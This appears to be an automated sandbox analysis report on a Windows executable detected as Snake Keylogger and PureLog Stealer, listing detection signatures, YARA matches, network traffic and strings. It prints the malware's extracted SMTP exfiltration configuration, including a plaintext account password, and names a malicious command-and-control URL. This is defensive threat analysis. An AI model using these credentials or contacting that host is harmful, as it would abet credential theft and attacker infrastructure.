Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DNXS-04-22.exe

Overview

General Information

Sample name:DNXS-04-22.exe
Analysis ID:1435145
MD5:64932c473d74fbdfdb706a094543cf37
SHA1:f19b8960681b56cab45a9f14871108cf4d522251
SHA256:8b9dedaa09d239667dd9cabe0c7efab61712868b32ebb3a50110df8980823ce9
Tags:exe
Infos:

Detection

PureLog Stealer, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DNXS-04-22.exe (PID: 5288 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)
    • DNXS-04-22.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)
    • DNXS-04-22.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\DNXS-04-22.exe" MD5: 64932C473D74FBDFDB706A094543CF37)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14880:$a1: get_encryptedPassword
          • 0x14b76:$a2: get_encryptedUsername
          • 0x1468c:$a3: get_timePasswordChanged
          • 0x14787:$a4: get_passwordField
          • 0x14896:$a5: set_encryptedPassword
          • 0x15e63:$a7: get_logins
          • 0x15dc6:$a10: KeyLoggerEventArgs
          • 0x15a5f:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          0.2.DNXS-04-22.exe.7570000.11.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.DNXS-04-22.exe.7570000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.DNXS-04-22.exe.337a064.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.DNXS-04-22.exe.337b07c.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.DNXS-04-22.exe.3359434.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 31 entries
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: DNXS-04-22.exeAvira: detected
                    Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
                    Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
                    Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
                    Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}
                    Source: scratchdreams.tkVirustotal: Detection: 17%Perma Link
                    Source: https://scratchdreams.tk/_send_.php?TSVirustotal: Detection: 16%Perma Link
                    Source: http://scratchdreams.tkVirustotal: Detection: 17%Perma Link
                    Source: https://scratchdreams.tkVirustotal: Detection: 18%Perma Link
                    Source: DNXS-04-22.exeReversingLabs: Detection: 65%
                    Source: DNXS-04-22.exeVirustotal: Detection: 69%Perma Link
                    Source: DNXS-04-22.exeJoe Sandbox ML: detected
                    Source: DNXS-04-22.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49711 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49726 version: TLS 1.2
                    Source: DNXS-04-22.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: JWXz.pdb source: DNXS-04-22.exe
                    Source: Binary string: JWXz.pdbSHA256 source: DNXS-04-22.exe
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D08D95h4_2_00D08A58
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D00B99h4_2_00D008F0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D07BA1h4_2_00D078F8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D00741h4_2_00D00498
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D0774Ah4_2_00D074A0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D002E9h4_2_00D00040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_00D03808
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D072C9h4_2_00D07020
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D05891h4_2_00D055E8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D01449h4_2_00D011A0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D08451h4_2_00D081A8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D07FF9h4_2_00D07D50
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D00FF1h4_2_00D00D48
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D06169h4_2_00D05EC0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D05D11h4_2_00D05A68
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D088A9h4_2_00D08600
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D06E71h4_2_00D06BC8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D06A19h4_2_00D06770
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 00D065C1h4_2_00D06318
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 028CF7A1h4_2_028CF4E8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_028CEA08
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 028CFBF9h4_2_028CF941
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06772658h4_2_06772240
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06770F11h4_2_06770C60
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677021Dh4_2_06770040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06770BA7h4_2_06770040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06772091h4_2_06771DE0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677D511h4_2_0677D268
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677D0B9h4_2_0677CE10
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677D969h4_2_0677D6C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677E219h4_2_0677DF70
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677DDC1h4_2_0677DB18
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677E671h4_2_0677E3C8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677EF21h4_2_0677EC78
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677EAC9h4_2_0677E820
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677F379h4_2_0677F0D0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06771371h4_2_067710C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677C809h4_2_0677C560
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 067717D1h4_2_06771520
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677F7D1h4_2_0677F528
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677C3B1h4_2_0677C108
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677CC61h4_2_0677C9B8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06772658h4_2_06772586
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 06771C31h4_2_06771980
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4x nop then jmp 0677FC29h4_2_0677F980

                    Networking

                    barindex
                    Source: Yara matchFile source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                    Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                    Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49711 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: scratchdreams.tk
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                    Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                    Source: DNXS-04-22.exeString found in binary or memory: http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225$
                    Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49726 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
